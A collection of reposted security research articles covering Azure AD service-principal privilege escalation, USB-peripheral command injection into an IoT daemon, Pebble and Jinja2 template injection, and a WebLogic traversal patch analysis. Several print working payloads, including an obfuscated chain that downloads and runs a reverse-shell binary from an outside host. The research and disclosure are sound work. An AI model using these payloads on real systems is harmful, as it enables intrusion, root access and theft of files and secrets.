{'client_id':'aa580612-c342-4ace-9055-8edee43ccb89', 'resource':'https://graph.microsoft.com', 'client_secret':'redactedpassword', 'grant_type':'client_credentials'} r = requests.post(AUTHORITY_URL + TOKEN_ENDPOINT, data=data) data2 = r.json() try: jwtdata = jwt.decode(data2['access_token'], verify=False) pprint.pprint(jwtdata) except KeyError: pass This will print the data from the token, containing the “Roles” field: { "aio": "42FgYJg946pl8aLnJXPOnn4zTe/mBwA=", "app_displayname": "Microsoft StaffHub", "appid": "aa580612-c342-4ace-9055-8edee43ccb89", "appidacr": "1", "aud": "https://graph.microsoft.com", "exp": 1567200473, "iat": 1567171373, "idp": "https://sts.windows.net/50ad18e1-bb23-4466-9154-bc92e7fe3fbb/", "iss": "https://sts.windows.net/50ad18e1-bb23-4466-9154-bc92e7fe3fbb/", "nbf": 1567171373, "oid": "56748bde-f24d-4a5b-aa2d-c88b175dfc80", "roles": ["Directory.ReadWrite.All", "Mail.Read", "Group.Read.All", "Files.Read.All", "Group.ReadWrite.All"], "sub": "56748bde-f24d-4a5b-aa2d-c88b175dfc80", "tid": "50ad18e1-bb23-4466-9154-bc92e7fe3fbb", "uti": "2GScBJopwk2e3EFce7pgAA", "ver": "1.0", "xms_tcdt": 1559139940 } This method only seemed to work for the Microsoft Graph (and not for the Azure AD graph). I am unsure if this is because no apps have permissions on the Azure AD graph or if the system used for these permissions is different. If we perform this action for all ~200 default apps in an Office 365 tenant, we get an overview of all the permissions these applications have. Below is an overview of the most interesting permissions that I’ve identified. Application name AppId Access Microsoft Forms c9a559d2-7aab-4f13-a6ed-e7e9c52aec87 Sites.ReadWrite.All Microsoft Forms c9a559d2-7aab-4f13-a6ed-e7e9c52aec87 Files.ReadWrite.All Microsoft Cloud App Security 05a65629-4c1b-48c1-a78b-804c4abdd4af Sites.ReadWrite.All Microsoft Cloud App Security 05a65629-4c1b-48c1-a78b-804c4abdd4af Sites.FullControl.All Microsoft Cloud App Security 05a65629-4c1b-48c1-a78b-804c4abdd4af Files.ReadWrite.All Microsoft Cloud App Security 05a65629-4c1b-48c1-a78b-804c4abdd4af Group.ReadWrite.All Microsoft Cloud App Security 05a65629-4c1b-48c1-a78b-804c4abdd4af User.ReadWrite.All Microsoft Cloud App Security 05a65629-4c1b-48c1-a78b-804c4abdd4af IdentityRiskyUser.ReadWrite.All Microsoft Teams 1fec8e78-bce4-4aaf-ab1b-5451cc387264 Sites.ReadWrite.All Microsoft StaffHub aa580612-c342-4ace-9055-8edee43ccb89 Directory.ReadWrite.All Microsoft StaffHub aa580612-c342-4ace-9055-8edee43ccb89 Group.ReadWrite.All Microsoft.Azure.SyncFabric 00000014-0000-0000-c000-000000000000 Group.ReadWrite.All Microsoft Teams Services cc15fd57-2c6c-4117-a88c-83b1d56b4bbe Sites.ReadWrite.All Microsoft Teams Services cc15fd57-2c6c-4117-a88c-83b1d56b4bbe Group.ReadWrite.All Office 365 Exchange Online 00000002-0000-0ff1-ce00-000000000000 Group.ReadWrite.All Microsoft Office 365 Portal 00000006-0000-0ff1-ce00-000000000000 User.ReadWrite.All Microsoft Office 365 Portal 00000006-0000-0ff1-ce00-000000000000 AuditLog.Read.All Azure AD Identity Governance Insights 58c746b0-a0b0-4647-a8f6-12dde5981638 AuditLog.Read.All Kaizala Sync Service d82073ec-4d7c-4851-9c5d-5d97a911d71d Group.ReadWrite.All So the TL;DR is that if you compromise an Application Administrator account or the on-premise Sync Account you can read and modify directory settings, group memberships, user accounts, SharePoint sites and OneDrive files. This is done by assigning credentials to an existing service principal with these permissions and then impersonating these applications. You can exploit this by assigning a password or certificate to a service principal and then logging in as that service principal. I use Python for logging in with a service principal password since the PowerShell module doesn’t support this (it does support certificates but that’s more complex to set up). The below command shows that when logging in with such a certificate, we do have the power to modify group memberships (something the application admin normally doesn’t have): PS C:\> add-azureadgroupmember -RefObjectId 2730f622-db95-4b40-9be7-6d72b6c1dad4 -ObjectId 3cf7196f-9d57-48ee-8912-dbf50803a4d8 PS C:\> Get-AzureADGroupMember -ObjectId 3cf7196f-9d57-48ee-8912-dbf50803a4d8 ObjectId DisplayName UserPrincipalName UserType -------- ----------- ----------------- -------- 2730f622-db95-4b40-9be7-6d72b6c1dad4 Mark mark@bobswrenches.onmicrosoft.com Member In the Azure AD audit log, the actions are shown as performed by “Microsoft StaffHub”, and thus nothing in the log indicates these actions were actually performed by the application administrator. Thoughts and disclosure process I don’t really see why credentials can be assigned to default service principals this way and what a possible legitimate purpose would be of this. In my opinion, it shouldn’t be possible to assign credentials to first-party Microsoft applications. The Azure portal doesn’t offer this option and does not display these “backdoor” service principals credentials, but the API’s such as the Microsoft Graph and Azure AD Graph have no such limitations. When I reported the fact that a privilege escalation is still possible this way (even after I was told it was fixed last year) I got a reply back from MSRC stating that Application Administrators assigning credentials to applications and obtaining more rights is documented and thus not a vulnerability. If you are administering an Azure AD environment I recommend implementing checks for credentials being assigned to default service principals and to regularly review who control the credentials of applications with high privileges. Updated: September 16, 2019 Sursa: https://dirkjanm.io/azure-ad-privilege-escalation-application-admin/
-
Command Injection with USB Peripherals by Danny Rosseau | Aug 22, 2019 | Danny Rosseau, Feature, News | 0 comments When this Project Zero report came out I started thinking more about USB as an interesting attack surface for IoT devices. Many of these devices allow users to plug in a USB and then perform some actions with that USB automatically, and that automatic functionality may be too trusting of the USB device. That post got filed away in my mind and mostly forgotten for a while until an IoT device with a USB port showed up at my door sporting a USB port. Sadly, I hadn’t yet gotten the mentioned Raspberry Pi Zero and shipping would probably take longer than my attention span would allow, but a coworker mentioned that Android has ConfigFS support so I decided to investigate that route instead, but let’s back up a bit and set the scene. I had discovered that the IoT device in question would automatically mount any USB mass storage device that was connected to it, and, if certain properties on the device were set, would use those properties — unsanitized — to create the mount directory name. Furthermore, this mounting would happen via a call to C’s infamous system function: a malicious USB device could potentially set these parameters in such a way as to get arbitrary command execution. Since the responsible daemon was running as root, this meant that I might be able to plug a USB in, wait a couple seconds, and then have command execution as root on the device. This naturally triggered my memories of all of those spy movies where the protagonist plugs something into a door’s highly sophisticated lock, which makes a bunch of numbers flash on the LED screen, magically opens the door, and makes them succinctly claim: “I’m in” in a cool tone. I wanted to do that. I was fairly certain my attack would work, but I wasn’t very familiar with turning my Android device into a custom USB peripheral and searches were mostly lacking a solution. This post is intended to supplement those lacking internet searches. If you want to follow along at home, I’m using a rooted Nexus 5X device running the last Android version it supports: 8.1. I’m not sure how different things are in Android 9 land. Android as a Mass Storage Device For my purposes, I need my Android device to show up as a USB mass storage device with the following properties controlled by me: the product name string, the product model string, and the disk label. You can customize much more than that, but I don’t care about the rest. We’ll start with what didn’t seem to work for me: I had a passing familiarity with ConfigFS and saw a /config/usb_gadget, so I figured I’d just use that to make a quick mass storage USB device using the ConfigFS method that I knew about. I wrote up a quick script to create all of the entries, but upon testing it I ran in to this: mkdir: '/config/usb_gadget/g1/functions/mass_storage.0': Function not implemented I’m still not sure why that route didn’t work, but apparently this method just isn’t supported. I was stumped for a bit and started digging into the Android and Linux kernel source code before taking a step back. I didn’t want to fall into the rabbit hole that was reading obscure kernel code: I just wanted to /bin/touch /tmp/haxxed on this device and declare myself 1337. So I left kernel land for Android init land to see what the Android devs do to change USB functionality. Taking a look at some Android init files here, you’ll notice that there are two different .rc files for USB: init.usb.configfs.rc and init.usb.rc. Keen observers (see: people who actually clicked those links) will see that each one has a check for the property sys.usb.configfs: if it is 1 the entries in the init.usb.configfs.rc file are used, otherwise the init.usb.rc entries are used. For me, sys.usb.configfs was 0 and I confirmed that things were being modified over in the /sys/class/android_usb directory, so I shifted my focus there. I haven’t gone back to investigate what would happen with sys.usb.configfs set to 1, so I’m not going to claim this is the only way to do this, but it is the way that worked for me. Exploring Unknown Lands Now that I’ve shifted my focus to the /sys/class/android_usb/android0 directory, let’s explore that. I see the following: bullhead:/sys/class/android_usb/android0 # ls bDeviceClass f_acm f_ffs f_rmnet iManufacturer power bDeviceProtocol f_audio f_gps f_rmnet_smd iProduct remote_wakeup bDeviceSubClass f_audio_source f_mass_storage f_rndis iSerial state bcdDevice f_ccid f_midi f_rndis_qc idProduct subsystem down_pm_qos_sample_sec f_charging f_mtp f_serial idVendor uevent down_pm_qos_threshold f_diag f_ncm f_uasp idle_pc_rpm_no_int_secs up_pm_qos_sample_sec enable f_ecm f_ptp f_usb_mbim pm_qos up_pm_qos_threshold f_accessory f_ecm_qc f_qdss functions pm_qos_state idVendor, idProduct, and iProduct, iManufacturer, and f_mass_storage look slightly familiar. If you are familiar with ConfigFS, the contents of f_mass_storage also looks similar to the contents of the mass_storage function: bullhead:/sys/class/android_usb/android0 # ls f_mass_storage device inquiry_string lun luns power subsystem uevent bullhead:/sys/class/android_usb/android0 # ls f_mass_storage/lun file nofua power ro uevent It is at this point that, if I were a less honest person, I’d tell you I know what is going on here. I don’t. My goal is just to hack the thing by making a malicious USB device, not learn the inner workings of the Linux kernel and how Android sets itself up as a USB peripheral. I intend to go deeper into this later, and will perhaps write a more comprehensive blog post at that point. There are plenty of hints around the source code and on the device itself that help figure out how to use this directory. One thing I see happening in init.usb.rc all the time is this line: write /sys/class/android_usb/android0/enable 0 .... write /sys/class/android_usb/android0/functions ${sys.usb.config} write /sys/class/android_usb/android0/enable 1 So what is function set to when I just have a developer device plugged in and am using ADB? bullhead:/sys/class/android_usb/android0 # cat functions ffs I happen to know that ADB on the device is implemented using FunctionFS, and ffs looks like shorthand for FunctionFS to me, so it makes sense that that would be enabled. I’m probably going to have to change that value, so let’s go ahead and set it to mass_storage and see what happens. bullhead:/sys/class/android_usb/android0 # echo 0 > enable And my ADB session dies. Right, you can’t just kill USB and expect to use a USB connection. Well, at least I know it works! Luckily ADB is nice enough to also work over TCP/IP, so I can restart and: adb tcpip 5555 adb connect 192.168.1.18:5555 For the record, I wouldn’t go doing that on your local coffee shop WiFi. OK, now that we’re connected — using the magic of photons — we can bring down USB and change to mass storage and see what happens. bullhead:/sys/class/android_usb/android0 # echo 0 > enable bullhead:/sys/class/android_usb/android0 # echo mass_storage > functions bullhead:/sys/class/android_usb/android0 # echo 1 > enable Cool, no errors or crashes or anything. If you’re familiar with ConfigFS you’ll probably also know that I can modify f_mass_storage/lun/file to give some backing storage for the mass storage device. If you’re not familiar with ConfigFS, you know that now: nice! If you already know how to make an image to back your USB mass storage device, you’re smarter than I was about a week ago and can probably skip the next section. Making Images One thing to keep in mind when making the image is that I need to be able to control the disk LABEL value (as seen by blkid). We’ll make a file and just use that instead of doing anything fancy. Note that I didn’t actually care about writing things to the USB’s disk: I just wanted it to be recognized by the target device as a mass storage device so that it would be mounted. To make our backing image file then, we’ll start off with a whole lot of nothing: dd if=/dev/zero of=backing.img count=50 bs=1M This will create a 50MB file named backing.img that is all 0s. That is pretty useless; we’re going to need to format it with fdisk. A more adept Linux hacker would probably know how to script this, but I, being an intellectual, did it this way: echo -e -n 'o\nn\n\n\n\n\nt\nc\nw\n' | fdisk backing.img That magic is filling out the fdisk entries for you. It looks like this: Welcome to fdisk (util-linux 2.31.1). Changes will remain in memory only, until you decide to write them. Be careful before using the write command. Device does not contain a recognized partition table. Created a new DOS disklabel with disk identifier 0xd643eccd. Command (m for help): Created a new DOS disklabel with disk identifier 0x50270950. Command (m for help): Partition type p primary (0 primary, 0 extended, 4 free) e extended (container for logical partitions) Select (default p): Using default response p. Partition number (1-4, default 1): First sector (2048-20479, default 2048): Last sector, +sectors or +size{K,M,G,T,P} (2048-20479, default 20479): Created a new partition 1 of type 'Linux' and of size 9 MiB. Command (m for help): Selected partition 1 Hex code (type L to list all codes): Changed type of partition 'Linux' to 'W95 FAT32 (LBA)'. Command (m for help): The partition table has been altered. Syncing disks. We’re making an image with a DOS partition table and a single FAT32 partition with everything else being the default. Cool. We need to do some formatting and labelling now: # losetup --offset 1048576 -f backing.img /dev/loop0 # mkdosfs -n "HAX" /dev/loop0 # losetup -d /dev/loop0 The magic 1048576 is 2048 * 512, which is the first sector times the sector size. Here we just attach our image as the /dev/loop0 device and run a simple mkdosfs: the -n "HAX" is important in my case as that gives me control over the LABEL. That’s all you need to do. Easy. Bringing it all Together Armed with our image we can now make the full USB device: $ adb tcpip 5555 $ adb connect 192.168.1.18:5555 $ adb push backing.img /dev/local/tmp/ $ adb shell And in the adb shell: $ su # echo 0 > /sys/class/android_usb/android0/enable # echo '/data/local/tmp/backing.img' > /sys/class/android_usb/android0/f_mass_storage/lun/file # echo 'mass_storage' > /sys/class/android_usb/android0/functions # echo 1 > /sys/class/android_usb/android0/enable If all goes well: # lsusb -v -d 18d1: Bus 003 Device 036: ID 18d1:4ee7 Google Inc. Device Descriptor: bLength 18 bDescriptorType 1 bcdUSB 2.00 bDeviceClass 0 (Defined at Interface level) bDeviceSubClass 0 bDeviceProtocol 0 bMaxPacketSize0 64 idVendor 0x18d1 Google Inc. idProduct 0x4ee7 bcdDevice 3.10 iManufacturer 1 LGE iProduct 2 Nexus 5X iSerial 3 0000000000000000 bNumConfigurations 1 Configuration Descriptor: bLength 9 bDescriptorType 2 wTotalLength 32 bNumInterfaces 1 bConfigurationValue 1 iConfiguration 0 bmAttributes 0x80 (Bus Powered) MaxPower 500mA Interface Descriptor: bLength 9 bDescriptorType 4 bInterfaceNumber 0 bAlternateSetting 0 bNumEndpoints 2 bInterfaceClass 8 Mass Storage bInterfaceSubClass 6 SCSI bInterfaceProtocol 80 Bulk-Only iInterface 5 Mass Storage Endpoint Descriptor: bLength 7 bDescriptorType 5 bEndpointAddress 0x81 EP 1 IN bmAttributes 2 Transfer Type Bulk Synch Type None Usage Type Data wMaxPacketSize 0x0200 1x 512 bytes bInterval 0 Endpoint Descriptor: bLength 7 bDescriptorType 5 bEndpointAddress 0x01 EP 1 OUT bmAttributes 2 Transfer Type Bulk Synch Type None Usage Type Data wMaxPacketSize 0x0200 1x 512 bytes bInterval 1 Device Qualifier (for other device speed): bLength 10 bDescriptorType 6 bcdUSB 2.00 bDeviceClass 0 (Defined at Interface level) bDeviceSubClass 0 bDeviceProtocol 0 bMaxPacketSize0 64 bNumConfigurations 1 Device Status: 0x0000 (Bus Powered) You can see the device here: $ ls -lh /dev/disk/by-id lrwxrwxrwx 1 root root 9 Aug 2 14:35 usb-Linux_File-CD_Gadget_0000000000000000-0:0 -> ../../sdb lrwxrwxrwx 1 root root 10 Aug 2 14:35 usb-Linux_File-CD_Gadget_0000000000000000-0:0-part1 -> ../../sdb1 And you should be able to mount: $ mkdir HAX && sudo mount /dev/sdb1 HAX I felt like Neo when that worked. Right now this is just a glorified thumb drive though. The real fun comes with the fact that we can change parameters: # echo 0 > /sys/class/android_usb/android0/enable # echo 1337 > /sys/class/android_usb/android0/idProduct # echo 'Carve Systems' > /sys/class/android_usb/android0/iManufacturer # echo '1337 Hacking Team' > /sys/class/android_usb/android0/iProduct # echo 1 > /sys/class/android_usb/android0/enable $ lsusb -v -d 18d1: Bus 003 Device 044: ID 18d1:1337 Google Inc. Device Descriptor: .... idProduct 0x1337 .... iManufacturer 1 Carve Systems iProduct 2 1337 Hacking USB .... Wow does that make it easy to make a malicious USB device. Hacking the Thing To bring everything full circle, I’ll go through the actual exploit that inspired this. The code I was exploiting looked somewhat similar to this: snprintf(dir, DIR_SIZE, "/mnt/storage/%s%s%s", LABEL, iManufacturer, iProduct); snprintf(cmd, CMD_SIZE, "mount %s %s", /dev/DEVICE, dir); system(cmd); My proof of concept exploit was the following: Drop a shell script at the vulnerable daemon’s cwd that will spawn a reverse shell Execute that file with sh One tricky bit is that they were removing whitespace and / from those variables, but luckily system was passing to a shell that understands $IFS and sub-shells. Once I had the Android device setup, exploiting this issue was straightforward, commands would be built as follows: echo 0 > enable echo ';{cmd};' > iProduct echo 1 > enable With the entire command chain looking like this (I removed some sleep commands that were necessary): # echo 0 > /sys/class/android_usb/android0/enable # echo ';echo${IFS}b=`printf$IFS'"'"'\\x2f'"'"'`>>a;' > /sys/class/android_usb/android0/iProduct # echo 1 > /sys/class/android_usb/android0/enable # echo 0 > /sys/class/android_usb/android0/enable # echo ';echo${IFS}s=\"$IFS\">>a;' > /sys/class/android_usb/android0/iProduct # echo 1 > /sys/class/android_usb/android0/enable # echo 0 > /sys/class/android_usb/android0/enable # echo ';echo${IFS}u=http:\$b\${b}192.168.1.152:8000\${b}shell>>a;' > /sys/class/android_usb/android0/iProduct # echo 1 > /sys/class/android_usb/android0/enable # echo 0 > /sys/class/android_usb/android0/enable # echo ';echo${IFS}curl\$s-s\$s-o\${s}shell\$s\$u>>a;' > /sys/class/android_usb/android0/iProduct # echo 1 > /sys/class/android_usb/android0/enable # echo 0 > /sys/class/android_usb/android0/enable # echo ';echo${IFS}chmod\$s+x\${s}shell>>a;' > /sys/class/android_usb/android0/iProduct # echo 1 > /sys/class/android_usb/android0/enable # echo 0 > /sys/class/android_usb/android0/enable # echo ';echo${IFS}\${b}shell>>a;' > /sys/class/android_usb/android0/iProduct # echo 1 > /sys/class/android_usb/android0/enable # echo 0 > /sys/class/android_usb/android0/enable # echo ';sh${IFS}a;' > /sys/class/android_usb/android0/iProduct # echo 1 > /sys/class/android_usb/android0/enable All of those commands together create the following file (/a😞 b=/ s=" " u=http:$b${b}192.168.1.152:8000${b}shell curl$s-s$s-o${s}shell$s$u chmod$s+x${s}shell ${b}shell The last command executes the file with sh a. This script pulls a binary I wrote to get a reverse shell. You could send your favorite reverse shell payload, but this way is always simple and makes verification quick. Upon the last command being executed, we’re greeted with the familiar: $ nc -l -p 3567 id uid=0(root) gid=0(root) groups=0(root) Nice. Takeaways While it is probably easier to get yourself a Raspberry Pi Zero, it is pretty handy that this can be done so easily through a rooted Android device. As for security takeaways: it is important to remember that ANY external input, even from physical devices, is not trustworthy. Also blacklists can sometimes leave holes that are easy to bypass. There were many ways to avoid this issue, but the most important part of any mitigation would be to not trust properties pulled off of an external device. If you need a unique name, generate a UUID. If you need a unique name that is constant for a given device, verify the required parameters exist and then hash them using SHA256 or your favorite hashing algorithm. The system C function should also be used sparingly: it is fairly straightforward to mount drives using just C code. Sursa: https://carvesystems.com/news/command-injection-with-usb-peripherals/
-
Server Side Template Injection – on the example of Pebble Michał Bentkowski | September 17, 2019 | Research Server-Side Template Injection isn’t exactly a new vulnerability in the world of web applications. It was made famous in 2015 by James Kettle in his famous blogpost on PortSwigger blog. In this post, I’ll share our journey with another, less popular Java templating engine called Pebble. Pebble and template injection According to its official page, Pebble is a Java templating engine inspired by Twig. It features templates inheritance and easy-to-read syntax, ships with built-in autoescaping for security, and includes integrated support for internationalization. It supports one of the most common syntax in templating engines, in which the variable substitution is done with {{ variable }}. More often than not, in templating engines it is possible to include arbitrary Java expressions. Imagine that you have a variable called name and you want to put it upper-case in the template, then you can use {{ name.toUpperCase() }}. The usual way of exploiting template injection in various expression languages in Java is to use code similar to the following: variable.getClass().forName('java.lang.Runtime').getRuntime().exec('ls -la') 1 variable.getClass().forName('java.lang.Runtime').getRuntime().exec('ls -la') Basically, every object in Java has a method called getClass() which retrieves a special java.lang.Class from which it is easy to get instance of arbitrary Java class. The usual next step is to get an instance of java.lang.Runtime since it allows to execute OS commands. When we came across Pebble for the first time, the code was basically identical to the one shown above. The only thing that needed to be done was to add mustache tags on the both sides: {{ variable.getClass().forName('java.lang.Runtime').getRuntime().exec('ls -la') }} 1 {{ variable.getClass().forName('java.lang.Runtime').getRuntime().exec('ls -la') }} Attempts to protect against getting arbitrary classes in Pebble The author of Pebble added a protection against the attack and blocked method invocation of getClass(). Initially, though, there was a funny way to bypass it because Pebble tried to be smart when looking for methods in expressions. Suppose you have the following expression: {{ someString.toUPPERCASE() }} 1 {{ someString.toUPPERCASE() }} The expression shouldn’t work since the right name of the method is toUpperCase() not toUPPERCASE(). Pebble, though, ignored casing in methods or properties names. So with the code above, you would actually call the “normal” toUpperCase(). So the issue was that when Pebble tried to block access to getClass(), it checked the name of the method case sensitive. So you could just use the following statement: {{ someString.getCLASS().forName(...) }} 1 {{ someString.getCLASS().forName(...) }} and bypass the protection. This issue was fixed in April 2019 in version 3.0.9 by making the comparison case insensitive. A few months later, when researching some other Java-related stuff and skimming through the documentation, I noticed that there is another built-in way to get access to instance of java.lang.Class. A few wrapper classes in java, like java.lang.Integer, has a field called TYPE whose type is java.lang.Class itself! Hence another way to execute arbitrary code is shown below: {{ (1).TYPE.forName(...) }} 1 {{ (1).TYPE.forName(...) }} I reported the issue to Pebble in July 2019, and it was fixed in master using the same approach as is used in FreeMarker, ie. a blacklist of method calls. So while I still can do {{ (1).TYPE }}, forName() method is blocked making it “impossible” to execute arbitrary code. I put the word “impossible” in quotes since I believe that a bypass is still out there to be found but I was unable to do so. That’s an interesting space to do some research. Reading the output of command (Java 9+) While it’s always been easy to execute arbitrary command in Java, in case of vulnerabilities like Server-Side Template Injection, sometimes it happens to be difficult to read the output. It was usually done via iterating over the resulting InputStream or sending the output out-of-band. When researching Pebble, I noticed that things got much easier in Java 9+ since now InputStream has a convenient method readAllBytes which returns a byte array! Then byte[] can be converted to String with the String constructor. Here’s the exploit: {% set cmd = 'id' %} {% set bytes = (1).TYPE .forName('java.lang.Runtime') .methods[6] .invoke(null,null) .exec(cmd) .inputStream .readAllBytes() %} {{ (1).TYPE .forName('java.lang.String') .constructors[0] .newInstance(([bytes]).toArray()) }} 1 2 3 4 5 6 7 8 9 10 11 12 {% set cmd = 'id' %} {% set bytes = (1).TYPE .forName('java.lang.Runtime') .methods[6] .invoke(null,null) .exec(cmd) .inputStream .readAllBytes() %} {{ (1).TYPE .forName('java.lang.String') .constructors[0] .newInstance(([bytes]).toArray()) }} And the result: Pebble example exploit Playing with Pebble If you wish to play with Pebble, we have prepared a GitHub repo with a Docker container in which you can run various versions of Pebble. You can grab it here: https://github.com/securitum/research/tree/master/r2019_server-side-template-injection-on-the-example-of-pebble. All you need to do is to make sure you have both docker and docker-compose installed and then just run docker-compose up. Then, the webserver runs on http://localhost:4567. Screenshot of Docker application Summary Pebble is not different that many other popular templating engines in which you can execute arbitrary commands if you are allowed to modify the template itself. The recommendation is to make sure that unauthorized users should never be able to modify templates. Author: Michał Bentkowski Sursa: https://research.securitum.com/server-side-template-injection-on-the-example-of-pebble/
-
RCE with Flask Jinja Template Injection AkShAy KaTkAr Sep 17 · 4 min read I got invite for private program on bugcrowd. Program do not have huge scope , just a single app with lots of features to test. I usually likes this kind of programs as I am not that good with recon . First thought , Lets Find out what technology a website is built with. I use wappalyzer for that. They were using Angular dart , python Django & flask . +.Being a Python developer for last few years , I know where commonly developer makes mistakes . There were one utility named work flow builder . which use to build a financial close process flow. You can automate daily activities with it like sending approval & sending reminder emails. Sending emails functionality caught my attention because most of times this email generator apps are vulnerable to template injection. As this website built with python , i was quite sure that they must be using Jinja2 template. Send email function have 3 fields . To , title & description . I set {{7*7}} as title & description & click on send email button . I got email as “49” as subject & {{7*7}} as description . So the subject field was vulnerable for template injection. Payload : {{7*7}} Payload {{7*7}} basically what this doing is evaluating python code inside curly brackets . I tried another payload to get list of sub classes of object class. Payload : {{ [].__class__.__base__.__subclasses__() }} I got email containing list of sub classes of object class. like below Payload : {{ [].__class__.__base__.__subclasses__() }} Let me explain you this payload , If you are familiar with python , You may know we can create list by using “[]” . You can try this things in python interpreter . Access class of list >>> [].__class__ <type 'list'> #return class of list 2. Access base class of list . >>> [].__class__.__base__ <type 'object'> #return base class of list List is sub class of “object” class. 3.Access sub classes of object class . >>> [].__class__.__base__.__subclasses__() [<type 'type'>, <type 'weakref'>, <type 'weakcallableproxy'>, <type 'weakproxy'>, <type 'int'>, <type 'basestring'>, <type 'bytearray'>, <type 'list'>..... So our payload gives us a list of all sub classes “object” class. I reported this issue as it is , hoping I don’t have to go further to prove it’s significant impact. bugcrowd triager reply me with this Ok , so now I have to provide POC to prove impact of this issue to mark it as P1. Most of django apps have config file which contains really sensitive info like AWS keys , API’s & encryption keys. I have path of that config file from my previous findings. So i decided to read that file . To read file in python you have to create object of “file”. We already have list of all sub classes of “Object class”. Lets find index of file class >>> [].__class__.__base__.__subclasses__().index(file) 40 #return index of "file" object When you run “[].__class__.__base__.__subclasses__().index(file)” this payload in python interpreter you will get index of “file” object. I tried same payload but it gives me nothing , something is wrong . I tried to access other objects but its giving similar error , not returning any value. Next , I decided to directly access file object as we know index of file object in “Object ” sub classes list is “40". So I tried this payload {{[].__class__.__base__.__subclasses__()[40] }} but got no success, this payload also returning similar result as above image. Payload is breaking somewhere , but not able to find where. After some research , I got on conclusion that may be indexing is block or breaking my payload. If you know little bit of python you may know there are multiple methods to return value in list , one of method is using “pop” function . >>> [1,2,3,4,5].pop(2) 3 Above code returning third value of list & removing it from that list. So now my new payload is {{[].__class__.__base__.__subclasses__().pop(40) }} Above payload gives me object of “file” . Ok, So now I have object of “file” , I can read any file on server . Let’s read “etc/passwd” file . Payload : {{[].__class__.__base__.__subclasses__().pop(40)('etc/passwd').read() }}. etc/passwd output in email subject Finally , I was able to read files on server. I also able to read local files on the GCE instance responsible for sending notifications, including some source code, and configuration files containing very sensitive values (e.g. API and encryption keys). Thanks for reading, If you like this article please share. You are free to ask any questions , Just DM me on akshukatkar . — — Morningstar Sursa: https://medium.com/@akshukatkar/rce-with-flask-jinja-template-injection-ea5d0201b870
-
Patch Analysis: Examining a Missing Dot-Dot in Oracle WebLogic September 17, 2019 | KP Choubey Earlier this year, an Oracle WebLogic deserialization vulnerability was discovered and released as an 0day vulnerability. The bug was severe enough for Oracle to break their normal quarterly patch cadence and release an emergency update. Unfortunately, researchers quickly discovered the patch could be bypassed by attackers. Patches that don’t completely resolve a security problem seem to be a bit of a trend, and Oracle is no exception. This blog covers a directory traversal bug that took more than one try to get fully corrected. Oracle initially patched this vulnerability as CVE-2019-2618 in April 2019, but later released a corrected patch in July. Vulnerability Details Oracle WebLogic is an application server for building and deploying Java Enterprise Edition (EE) applications. The default installation of the WebLogic server contains various applications to maintain and configure domains and applications. One such application is bea_wls_deployment_internal.war, which contains a feature to upload files. A file can be uploaded by sending an authenticated request to the URI /bea_wls_deployment_internal/DeploymentService. The application calls the handlePlanOrApplicationUpload() method if the value of the wl_request_type header of the request is “app_upload” or “plan_upload”. The handlePlanOrApplicationUpload() method validates the value of the wl_upload_application_name header and checks for two variants of directory traversal characters: ../ and /..: Figure 1 - Directory Traversal Character Checks – With Comments Added The path <ORACLE_HOME>\user_projects\domains\[DOMAIN NAME]\servers\AdminServer\upload\ is stored in variable uploadingDirName. The wl_upload_application_name request header value is used as subdirectory of this path. The method shown above appends the user-controlled value wl_upload_application_name to uploadingDirName and passes it via the saveDirectory argument of doUploadFile(). The doUploadFile() function should create a file in this location using the filename parameter of the request: Figure 2 - The doUploadFile() Function The wl_upload_application_name and filename fields were vulnerable to directory traversal. In April 2019, Oracle tried to patch the directory traversal as CVE-2019-2618. The patch for CVE-2019-2618 added checks for two more variants of directory traversal characters in the wl_upload_application_name field: \.. and ..\: Figure 3 - Code Changes from CVE-2019-2618 For the filename field, CVE-2019-2618 added a check to doUploadFile() to ensure the final path where the file is saved contains the proper save directory as indicated by variable saveDir. The value of saveDir is <ORACLE_HOME>\user_projects\domains\[DOMAIN NAME]\servers\AdminServer\upload\[UPLOAD_APP], where the value of [UPLOAD_APP] is found in wl_upload_application_name. The patched doUploadFile() method throws an error if filename variable contains directory traversal characters and does not contain the string represented by saveDir: Figure 4 - Exception Error for saveDir This validation of the fileName field is mostly sufficient. As a side note, though, it would have been better if they had used startsWith instead of contains. The way the patch is written, the validation theoretically can be bypassed if anywhere within the final path there is a substring resembling the legitimate save path. There is no direct route to exploitation, though. The doUploadFile() function will not automatically create a directory structure if the one specified by saveTo doesn’t exist. So, for a bypass of the above patch to be relevant, an attacker would need some other technique that is powerful enough to enable creation of arbitrary directory structures within a sensitive location on the server, yet fails to offer a file upload capability of its own. On the whole, this is an unlikely scenario. However, in regard to the wl_upload_application_name header field, the CVE-2019-2618 patch is inadequate and can be bypassed by setting the value wl_upload_application_name header to .. (dot-dot). This allows uploading to any subdirectory of the <ORACLE_HOME>\user_projects\domains\[DOMAIN NAME]\servers\AdminServer directory. Note the absence of the final path component, which should be “upload”. This is a sufficient condition to achieve code execution by writing a JSP file within the <ORACLE_HOME>\user_projects\domains\[DOMAIN NAME]\servers\AdminServer\tmp\ directory. An example of a POST request to write a file poc.jsp to a location within the <ORACLE_HOME>\user_projects\domains\[DOMAIN NAME]\servers\AdminServer\tmp directory is as follows: Figure 5 - Demonstration the Directory Traversal A file written to the \_WL_internal\bea_wls_internal subdirectory of the tmp directory can be accessed without authentication. For the aforementioned example, the attacker can execute JSP code by sending a request to the URI /bea_wls_internal/pos.jsp. The patch for CVE-2019-2827 released in July fixed the directory traversal vulnerability correctly by validating the wl_upload_application_name header field for .. (dot-dot) directory traversal characters as follows: Figure 6 - Code Changes for CVE-2019-2827 Conclusion Variations of directory traversal bugs have existed for some time, but continue to affect multiple types of software. Developers should ensure they are filtering or sanitizing user input prior to using it in file operations. Over the years, attackers have used various encoding tricks to get around traversal defenses. For example, using URI encoding “%2e%2e%2f” translates to “../” and could evade some filters. Never underestimate the creativity of those looking to exploit your systems. While this blog covers a failed patch from Oracle, multiple vendors have similar problems. Patch analysis is a great way to probe for things that may have been missed by the developers, and a great way to find related bugs is to examine the patched components. You can find me on Twitter @nktropy, and follow the team for the latest in exploit techniques and security patches. Sursa: https://www.zerodayinitiative.com/blog/2019/9/16/patch-analysis-examining-a-missing-dot-dot-in-oracle-weblogic
-
